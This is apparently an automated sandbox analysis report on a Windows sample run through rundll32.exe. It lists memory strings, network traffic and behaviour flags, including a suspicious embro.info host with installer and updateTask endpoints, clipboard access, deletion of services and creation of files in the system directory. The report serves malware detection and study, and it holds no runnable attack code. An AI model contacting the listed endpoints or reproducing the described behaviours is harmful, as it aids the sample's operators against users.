Source: rundll32.exe, rundll32.exe, 00000027.00000002.1446783379.000001C9C8530000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000027.00000003.1427149075.000001C9C841A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000002D.00000003.1463086671.0000022638E17000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000002D.00000002.1464421881.0000022638F20000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000002F.00000003.1463181477.000001A89316C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000002F.00000002.1464566083.000001A893280000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000030.00000002.1465060549.00000265DD1F0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000030.00000003.1463196912.00000265DD0E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: rundll32.exe String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: rundll32.exe, rundll32.exe, 00000027.00000002.1446783379.000001C9C8530000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000027.00000003.1427149075.000001C9C841A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000002D.00000003.1463086671.0000022638E17000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000002D.00000002.1464421881.0000022638F20000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000002F.00000003.1463181477.000001A89316C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000002F.00000002.1464566083.000001A893280000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000030.00000002.1465060549.00000265DD1F0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000030.00000003.1463196912.00000265DD0E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/hsts.html
Source: rundll32.exe String found in binary or memory: https://curl.se/docs/hsts.html#
Source: rundll32.exe, rundll32.exe, 00000027.00000002.1446783379.000001C9C8530000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000027.00000003.1427149075.000001C9C841A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000002D.00000003.1463086671.0000022638E17000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000002D.00000002.1464421881.0000022638F20000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000002F.00000003.1463181477.000001A89316C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000002F.00000002.1464566083.000001A893280000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000030.00000002.1465060549.00000265DD1F0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000030.00000003.1463196912.00000265DD0E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: rundll32.exe String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: svchost.exe, 00000000.00000002.1446349213.0000026B78258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1428257488.0000026B78257000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
Source: svchost.exe, 00000000.00000003.1428375584.0000026B78266000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1425857973.0000026B7825A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1446313458.0000026B78242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1428442083.0000026B78284000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1427452911.0000026B78241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1427443653.0000026B78282000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1446424516.0000026B78263000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1418425282.0000026B78262000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000000.00000002.1446627199.0000026B78285000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1428442083.0000026B78284000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1427443653.0000026B78282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000000.00000002.1446349213.0000026B78258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1428257488.0000026B78257000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000000.00000002.1446453851.0000026B78268000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1418388349.0000026B78267000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000000.00000003.1417764385.0000026B78286000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1446652719.0000026B78288000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 00000000.00000002.1446349213.0000026B78258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1428257488.0000026B78257000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000000.00000003.1428375584.0000026B78266000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1425857973.0000026B7825A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1418425282.0000026B78262000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000000.00000002.1446349213.0000026B78258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1428257488.0000026B78257000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000000.00000002.1446453851.0000026B78268000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1418388349.0000026B78267000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1446191210.0000026B7822B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000000.00000002.1446349213.0000026B78258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1428257488.0000026B78257000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000000.00000002.1446349213.0000026B78258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1428257488.0000026B78257000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000000.00000002.1446349213.0000026B78258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1428257488.0000026B78257000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000000.00000003.1428375584.0000026B78266000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1446297264.0000026B7823F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1418425282.0000026B78262000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000000.00000002.1446313458.0000026B78242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1427452911.0000026B78241000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000000.00000002.1446349213.0000026B78258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1428257488.0000026B78257000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000000.00000002.1446424516.0000026B78263000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1418425282.0000026B78262000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000000.00000003.1417727698.0000026B78233000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1446424516.0000026B78263000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1418425282.0000026B78262000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000000.00000003.1427452911.0000026B78241000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000000.00000002.1446424516.0000026B78263000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1418425282.0000026B78262000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000000.00000002.1446313458.0000026B78242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1427452911.0000026B78241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1418560381.0000026B7825E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
Source: svchost.exe, 00000000.00000003.1419169080.0000026B7825D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1418425282.0000026B78262000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000000.00000002.1446349213.0000026B78258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1428257488.0000026B78257000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000000.00000003.1417727698.0000026B78233000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/
Source: svchost.exe, 00000000.00000002.1446453851.0000026B78268000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1418388349.0000026B78267000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1428145464.0000026B7822D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: rundll32.exe, 00000007.00000002.1508449489.0000000004CE7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.1529987679.0000000005305000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/
Source: rundll32.exe, 00000006.00000003.1531585454.0000000002E47000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1532207523.0000000002E47000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/-
Source: rundll32.exe, 00000006.00000003.1531203206.0000000002ECF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1532289168.0000000002ECF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/0-3AEA-1069-A2D8-08002B30309D
Source: rundll32.exe, 00000007.00000002.1508449489.0000000004CE7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/I
Source: rundll32.exe, 0000000F.00000002.1529987679.00000000052A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/S
Source: rundll32.exe, 0000000F.00000002.1529987679.00000000052A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/U
Source: rundll32.exe, 00000006.00000003.1382967097.0000000004D7C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/X~
Source: rundll32.exe, 00000007.00000002.1508449489.0000000004CE7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/_
Source: rundll32.exe, 0000000F.00000002.1529987679.0000000005305000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/a
Source: rundll32.exe, 00000006.00000003.1531203206.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1532289168.0000000002E99000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1507666527.0000000002D69000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1506478813.0000000002D29000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.1528772926.0000000003269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.1529469355.00000000032A9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/installer.php
Source: rundll32.exe, 00000006.00000003.1531585454.0000000002E47000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1532997737.0000000004D48000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1532207523.0000000002E47000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/installer.php?pixid=2&campaignId=&firstrun=1&bg=1&cmdline=%22C%3A%5CUsers%5Cfront
Source: rundll32.exe, 00000007.00000002.1508449489.0000000004CE7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/installer.php?pixid=2&campaignId=&firstrun=1&bg=1&cmdline=C%3A%5CUsers%5Cuseres
Source: rundll32.exe, 00000006.00000003.1531203206.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1532289168.0000000002E99000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1507666527.0000000002D69000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1506478813.0000000002D29000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.1528772926.0000000003269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.1529469355.00000000032A9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/installer/finish
Source: rundll32.exe, 0000000F.00000002.1529987679.0000000005305000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.1529987679.00000000052E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/installer/finish?v=e1.0.0.28&tv=1.0-90000&unique_id=EA0012FA9C0BA3312209B38DA78C5
Source: rundll32.exe, 00000006.00000003.1531203206.0000000002ECF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1532289168.0000000002ECF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/installer/finish?v=e1.0.0.28&tv=1.0-90000&unique_id=ErR
Source: rundll32.exe, 00000006.00000002.1533859291.00000000055E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/installer/finishixid=2&campaignId=&firstrun=1&bg=1&cmdline=%22C%3A%5CUsers%5Cfron
Source: rundll32.exe, 00000007.00000002.1508638447.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/installer/finishixid=2&campaignId=&firstrun=1&bg=1&cmdline=C%3A%5CUsers%5Cusere
Source: rundll32.exe, 00000006.00000002.1532177913.0000000002E32000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1531480442.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1507561144.0000000002D02000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1507087077.0000000002D01000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.1528772926.0000000003269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.1529469355.00000000032A9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/installer/get_timestamp.php
Source: rundll32.exe, 00000007.00000002.1507561144.0000000002D02000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1507087077.0000000002D01000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/installer/get_timestamp.php./
Source: rundll32.exe, 00000006.00000003.1531203206.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1532289168.0000000002E99000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1507666527.0000000002D69000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1506478813.0000000002D29000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.1528772926.0000000003269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.1529469355.00000000032A9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/installer/get_timestamp.php1023
Source: rundll32.exe, 00000006.00000003.1531203206.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1532289168.0000000002E99000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1507666527.0000000002D69000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1506478813.0000000002D29000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.1528772926.0000000003269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.1529469355.00000000032A9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/installer/start500
Source: rundll32.exe, 00000006.00000003.1382772442.0000000004D84000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1532997737.0000000004D48000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1532997737.0000000004D23000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1508449489.0000000004CD1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1508449489.0000000004C80000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.1529987679.00000000052A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/installer/start?v=e1.0.0.28&tv=1.0-90000&unique_id=EA0012FA9C0BA3312209B38DA78C55
Source: rundll32.exe, 00000007.00000002.1508449489.0000000004C80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://embro.info/j
Source: rundll32.exe, rundll32.exe, 00000027.00000002.1446783379.000001C9C8530000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000002D.00000002.1464421881.0000022638F20000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000002F.00000002.1464566083.000001A893280000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000030.00000002.1465060549.00000265DD1F0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: https://embro.info/updateTask/index.php
Source: svchost.exe, 00000000.00000003.1417727698.0000026B78233000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ss
Source: svchost.exe, 00000000.00000003.1417727698.0000026B78233000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.v
Source: svchost.exe, 00000000.00000003.1417727698.0000026B78233000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualea0D#xk
Source: svchost.exe, 00000000.00000003.1427452911.0000026B78241000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000000.00000003.1417727698.0000026B78233000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000000.00000003.1426967132.0000026B78249000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1446270438.0000026B78235000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1427452911.0000026B78241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1417727698.0000026B78233000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1446349213.0000026B78258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1428257488.0000026B78257000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000000.00000003.1428145464.0000026B7822D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1446191210.0000026B7822B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000000.00000002.1446349213.0000026B78258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1428257488.0000026B78257000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000000.00000002.1446349213.0000026B78258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1428257488.0000026B78257000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown HTTPS traffic detected: 172.67.207.72:443 -> 192.168.2.7:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.207.72:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.207.72:443 -> 192.168.2.7:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.207.72:443 -> 192.168.2.7:49741 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046A664C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 6_2_046A664C
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85B1420 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext, 39_2_000001C9C85B1420
Contains functionality to delete services
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD9773420 OpenSCManagerA,OpenServiceW,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle, 33_2_0000021BD9773420
Contains functionality to launch a process as a different user
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD978B1D0 WTSQueryUserToken,GetCurrentProcess,OpenProcessToken,WTSQueryUserToken,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,DuplicateTokenEx,CloseHandle,CloseHandle,CreateProcessAsUserW,CloseHandle,CloseHandle,DestroyEnvironmentBlock,CloseHandle,CloseHandle,CloseHandle, 33_2_0000021BD978B1D0
Contains functionality to shutdown / reboot the system
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046A1130 SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,lstrcpynW,lstrcpynW,GetCommandLineW,lstrcpynW,GetModuleHandleW,CharNextW,lstrcpynW,GetTempPathW,GetTempPathW,lstrcatW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcpynW,lstrcpynW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,lstrcpynW,lstrcpynW,DeleteFileW,CopyFileW,CloseHandle,lstrcatW,lstrlenW,lstrcmpiW,GetFileAttributesW,lstrcpynW,LoadImageW,RegisterClassW,SystemParametersInfoW,CreateWindowExW,CloseHandle,FreeLibrary,GlobalFree,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx, 6_2_046A1130
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045E1130 SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,lstrcpynW,lstrcpynW,GetCommandLineW,lstrcpynW,GetModuleHandleW,CharNextW,lstrcpynW,GetTempPathW,GetTempPathW,lstrcatW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcpynW,lstrcpynW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,lstrcpynW,lstrcpynW,DeleteFileW,CopyFileW,CloseHandle,lstrcatW,lstrlenW,lstrcmpiW,GetFileAttributesW,lstrcpynW,LoadImageW,RegisterClassW,SystemParametersInfoW,CreateWindowExW,CloseHandle,FreeLibrary,GlobalFree,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx, 7_2_045E1130
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_03451130 SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,lstrcpynW,lstrcpynW,GetCommandLineW,lstrcpynW,GetModuleHandleW,CharNextW,lstrcpynW,GetTempPathW,GetTempPathW,lstrcatW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcpynW,lstrcpynW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,lstrcpynW,lstrcpynW,DeleteFileW,CopyFileW,CloseHandle,lstrcatW,lstrlenW,lstrcmpiW,GetFileAttributesW,lstrcpynW,LoadImageW,RegisterClassW,SystemParametersInfoW,CreateWindowExW,CloseHandle,FreeLibrary,GlobalFree,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx, 15_2_03451130
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\{f4b964cf-1b7a-aa88-03cb-3533f33b6987} Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\{f4b964cf-1b7a-aa88-03cb-3533f33b6987}\c23a32abd836342a70b7f6c1aa74947e.2.E Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\{f4b964cf-1b7a-aa88-03cb-3533f33b6987}\c23a32abd836342a70b7f6c1aa74947e.2 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\{f4b964cf-1b7a-aa88-03cb-3533f33b6987}\66f120532d0318a6a449e3c438427a15.2 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\{f4b964cf-1b7a-aa88-03cb-3533f33b6987}\66f120532d0318a6a449e3c438427a15.2.E Jump to behavior
